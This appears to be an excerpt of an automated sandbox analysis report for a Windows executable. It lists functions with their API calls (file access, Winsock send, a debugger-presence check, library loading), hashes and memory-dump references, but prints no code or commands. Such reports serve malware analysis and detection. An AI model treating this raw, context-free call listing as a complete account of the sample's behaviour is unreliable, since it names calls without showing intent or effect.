APIs

Part of subcall function 0041193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00411952

SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0044E344
_strlen.LIBCMT ref: 0044E34F

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: MessageSend$Timeout_strlen
String ID:
API String ID: 2777139624-0
Opcode ID: 829ed2e128fe29f059d8b97f6a7ff92e8f6778bd21cdb631c1f3b077455a6086
Instruction ID: e93466e7a8320ff06feed522e369ab7b6ab1c32cbb5565130bceface5efbb196
Opcode Fuzzy Hash: 829ed2e128fe29f059d8b97f6a7ff92e8f6778bd21cdb631c1f3b077455a6086
Instruction Fuzzy Hash: B611A73160020467DB05BF6BDC869FF7BA8AF45748F00443FFA069B192DE69984696AC

Function 00413682 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

74D2C8D0.UXTHEME ref: 004136E6

Part of subcall function 00432025: __lock.LIBCMT ref: 0043202B

Part of subcall function 004132DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 004132F6
Part of subcall function 004132DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0041330B

Part of subcall function 0041374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 0041376D
Part of subcall function 0041374E: IsDebuggerPresent.KERNEL32(?,?), ref: 0041377F
Part of subcall function 0041374E: GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\._cache_KOGJZW.exe,00000104,?,004D1120,C:\Users\user\Desktop\._cache_KOGJZW.exe,004D1124,?,?), ref: 004137EE
Part of subcall function 0041374E: SetCurrentDirectoryW.KERNEL32(?), ref: 00413860

SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00413726

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$DebuggerFullNamePathPresent__lock
String ID:
API String ID: 3809921791-0
Opcode ID: c73e604410186c8ed872a8f75d1087173c35da50a69ea46a1b18eb4b484eb86d
Instruction ID: a9e7d601be6ba81dce069412894bfe1013ad4135f241a24eb41829804c619bfd
Opcode Fuzzy Hash: c73e604410186c8ed872a8f75d1087173c35da50a69ea46a1b18eb4b484eb86d
Instruction Fuzzy Hash: 90119371908341ABC300EF66EE4590ABBE8FF94714F00852FF854832B1D7B49584CB9A

Function 00414B88 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000001,?,00414C2B,?,?,?,?,0041BE63), ref: 00414BB6
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000001,?,00414C2B,?,?,?,?,0041BE63), ref: 00484972

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 295afaee25c69fae75a3d7ef51927c4f11c0e1f3548e8f797009029d2968a14a
Instruction ID: 7c094670ab18b17dfa21ad71369e37ed73ab2b8942655cb9b6cd628a91761255
Opcode Fuzzy Hash: 295afaee25c69fae75a3d7ef51927c4f11c0e1f3548e8f797009029d2968a14a
Instruction Fuzzy Hash: 8C019B701483087EF3345E24CC86FA73BDCEB45768F108716F6E45A1D0C6B46D858718

Function 0042F26B Relevance: 3.1, APIs: 2, Instructions: 52COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0045AEA5,?,?,00000000,00000008), ref: 0042F282
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0045AEA5,?,?,00000000,00000008), ref: 0042F2A6

Part of subcall function 0042F2D0: _memmove.LIBCMT ref: 0042F307

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: ByteCharMultiWide$_memmove
String ID:
API String ID: 3033907384-0
Opcode ID: 02ae874ed9662336c4243d3809be5d7faf322452a115b5a0715e2cb00f9e1cbd
Instruction ID: 46ba38647765b9dc9b89c13cb98c167ad9090d0bee99acd98e8060f486d26592
Opcode Fuzzy Hash: 02ae874ed9662336c4243d3809be5d7faf322452a115b5a0715e2cb00f9e1cbd
Instruction Fuzzy Hash: 68F044B6504114BFAB10AB66EC45C7B7FADEF4A360780813BFD08CA115DA36DC008679

Function 0043F782 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 0043F7D9
__close_nolock.LIBCMT ref: 0043F7F2

Part of subcall function 0043886A: __getptd_noexit.LIBCMT ref: 0043886A

Part of subcall function 0043889E: __getptd_noexit.LIBCMT ref: 0043889E

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle__close_nolock
String ID:
API String ID: 1046115767-0
Opcode ID: 931443032856da55fa703e7871ebfc417ea46614a60aa133048aeb5f6e684cd8
Instruction ID: 2e2f139425ca13c61a69ff6910e8f22f83d07dbbda859d52cdbafa353dfd3726
Opcode Fuzzy Hash: 931443032856da55fa703e7871ebfc417ea46614a60aa133048aeb5f6e684cd8
Instruction Fuzzy Hash: 8B110272C066109ED71D7FA9D84234977905F4A338F66226BE5601F2E3CBBC990486AE

Function 00469500 Relevance: 3.0, APIs: 2, Instructions: 46networkCOMMON

Download Yara Rule

APIs

send.WS2_32(00000000,?,00000000,00000000), ref: 00469534
WSAGetLastError.WS2_32(00000000,?,00000000,00000000), ref: 00469557

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: ErrorLastsend
String ID:
API String ID: 1802528911-0
Opcode ID: 24e572463e2d0b3b146267b4f008b3b4be982107767ac372f5d6c570e2f6c9e2
Instruction ID: 9cede110555f41451cd8b42aea358513b48c45cdddad783dcb3549d2bf3a1511
Opcode Fuzzy Hash: 24e572463e2d0b3b146267b4f008b3b4be982107767ac372f5d6c570e2f6c9e2
Instruction Fuzzy Hash: BC01B132300200AFC710DB25D881B6AB3E9EF98725F10802EE94A87391CB74EC05CB99

Function 00434274 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0043889E: __getptd_noexit.LIBCMT ref: 0043889E

__lock_file.LIBCMT ref: 004342B9

Part of subcall function 00435A9F: __lock.LIBCMT ref: 00435AC2

__fclose_nolock.LIBCMT ref: 004342C4

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 4c1483fe58d68d37175236760b453a60df6ccf6a18911afe0f2bee9f0fa92fc7
Instruction ID: ffcbcc384b70e562d77cafbd4d0322afdda7d871276e8c60342c0878da8d6c85
Opcode Fuzzy Hash: 4c1483fe58d68d37175236760b453a60df6ccf6a18911afe0f2bee9f0fa92fc7
Instruction Fuzzy Hash: 1EF0BB718017049AD7207B768802B9F77D05F89378F21A24FB854BB1C1CB7CA9015F5D

Function 0042F55E Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0042F57A

Part of subcall function 0041E1F0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E279

Sleep.KERNEL32(00000000), ref: 004875D3

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: MessagePeekSleepTimetime
String ID:
API String ID: 1792118007-0
Opcode ID: 3b3e46f5fe72213fad8eefdfbdd738582b13253b95d9e6e4d2543f67a62fde4b
Instruction ID: 443fb329304846019d09e38ef6c98d46eb29f868bf09102dc3c13b3bc6ac5e6c
Opcode Fuzzy Hash: 3b3e46f5fe72213fad8eefdfbdd738582b13253b95d9e6e4d2543f67a62fde4b
Instruction Fuzzy Hash: 16F08C71240214AFD354EF6AE845B9ABBE8BF59324F00043BF819C7251DB70A840CBD9

Function 004181C6 Relevance: 1.9, APIs: 1, Instructions: 438COMMON

Download Yara Rule

APIs

Part of subcall function 004184A6: __swprintf.LIBCMT ref: 004184E5
Part of subcall function 004184A6: __itow.LIBCMT ref: 00418519

__wcsnicmp.LIBCMT ref: 004183C4

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: __itow__swprintf__wcsnicmp
String ID:
API String ID: 712828618-0
Opcode ID: 8ab493cf396f586e988fbb2cd5b1780cf546e8ed0e37217accfc2a0838a8d3ce
Instruction ID: 77f90bb0a1ba43d7828aa05e3fc9577f0a5d3b3e9ff7964f98a791efda997e6d
Opcode Fuzzy Hash: 8ab493cf396f586e988fbb2cd5b1780cf546e8ed0e37217accfc2a0838a8d3ce
Instruction Fuzzy Hash: 7EF17E71508306AFC705EF19C8918AFBBE5FF98304F54891EF89587261EB38E945CB4A

Function 00424040 Relevance: 1.7, APIs: 1, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca55a8790d7cd0e5e7960c90d9e329dd0bff79563238d8607ea337c53e4f0b64
Instruction ID: 18724bb252c44640e7885e05202ae792aee02c23b50b330c04399ccac20ba47e
Opcode Fuzzy Hash: ca55a8790d7cd0e5e7960c90d9e329dd0bff79563238d8607ea337c53e4f0b64
Instruction Fuzzy Hash: 2B61D270B00216AFCB00EF55D894A7AB7E4FF58314F50866FE91687241D738EC95CB99

Function 0042EF0D Relevance: 1.7, APIs: 1, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27172d07f841496c298897dd71aceff4a61888162cb04b946a9bffa55677ab3a
Instruction ID: 3f1d938ad82ed25fd47d87de83c5ecad5cf9ce52e4b0a43f09a1466166193b23
Opcode Fuzzy Hash: 27172d07f841496c298897dd71aceff4a61888162cb04b946a9bffa55677ab3a
Instruction Fuzzy Hash: 8951D174700114ABCF04EF69C991EAE77B6AF49318B15406FF90A9B392CB38ED45D748

Function 0041B6D0 Relevance: 1.6, APIs: 1, Instructions: 118COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0041B7C2

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 653a53b8435a0736043d6b22074b13ebbbade5d52c540747a625e5d2bf85aa42
Instruction ID: 4721dff839965b2b3636701c29717f6f7dc4feb666e613772fc6881add326715
Opcode Fuzzy Hash: 653a53b8435a0736043d6b22074b13ebbbade5d52c540747a625e5d2bf85aa42
Instruction Fuzzy Hash: DA41A079200602CFC714DF1AD4919A2F7E0FF89361714C52FE8AA87791D734E892CB99

Function 00488135 Relevance: 1.6, APIs: 1, Instructions: 112COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00488146

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: f15a094d428fb7a1f1ed4550c00ad023508ce12665612bf8357f533f08dc01fb
Instruction ID: 03cc2ae9ac87ec1a3a0f3cfaf21e3e7689b44ecef88cf9f18812beb2b788232e
Opcode Fuzzy Hash: f15a094d428fb7a1f1ed4550c00ad023508ce12665612bf8357f533f08dc01fb
Instruction Fuzzy Hash: 9F418F34A001259FCB20DF48D484AAAB7B1FF04311F98C56BE8495B365D73DED92CB99

Function 00414EE9 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00414F8F

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: aeb97d6b8f0775be04b96c0f3d13cefed0ffc62ef516f2320ea507e7bfbb044a
Instruction ID: 770234313fb6449f100ca95393cc62ad8c595854a8517bb1159f4600dcb24aa0
Opcode Fuzzy Hash: aeb97d6b8f0775be04b96c0f3d13cefed0ffc62ef516f2320ea507e7bfbb044a
Instruction Fuzzy Hash: 54318171A0060AAFCB08CF6DC480A9EB7B1FF88314F14862AE81993750D778BD91CBD4

Function 0042F92C Relevance: 1.6, APIs: 1, Instructions: 94COMMON

Download Yara Rule

APIs

select.WS2_32 ref: 0042F9DB

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: select
String ID:
API String ID: 1274211008-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: eb795848319d08968997939ddc2ab0809791479852121a751d6fcd43874461fb
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 0131D4B0B00116ABC718DF58E480A6AFBB5FB49300BA482B6E44ACB355D735EDC5CBD5

Function 00414D67 Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00414DAD

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 2b5483edc3a3253f34c400556e40e75bff093e7a71007e98c33499648a294427
Instruction ID: ef56aff49b407529f1b2ab8e1bea1709e50ac23fe061ce90a43a6cff236e3d0b
Opcode Fuzzy Hash: 2b5483edc3a3253f34c400556e40e75bff093e7a71007e98c33499648a294427
Instruction Fuzzy Hash: 4221C070600A05EBCF10AF52F985AAD7BF8EB96344F22897FE486C5110EB7895D0C75D

Function 0041D805 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0041D837

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 850a3e34ffcf0575de9322bf5b98585c373294fd89485bbbcd9ce223ec0d444b
Instruction ID: 2a939baded80e8104c8730d4118977b07b427a622f62e5ddf3d4da0e828bc97c
Opcode Fuzzy Hash: 850a3e34ffcf0575de9322bf5b98585c373294fd89485bbbcd9ce223ec0d444b
Instruction Fuzzy Hash: 62114CB5600601DFC724DF29D581A56B7F9FF49324B20842FE89ACB661E736E881CB54

Function 00413F9B Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00413F5D: FreeLibrary.KERNEL32(00000000,?), ref: 00413F90

Part of subcall function 00434129: __wfsopen.LIBCMT ref: 00434134

LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,004134E2,?,00000001), ref: 00413FCD

Part of subcall function 00413E78: FreeLibrary.KERNEL32(00000000), ref: 00413EAB

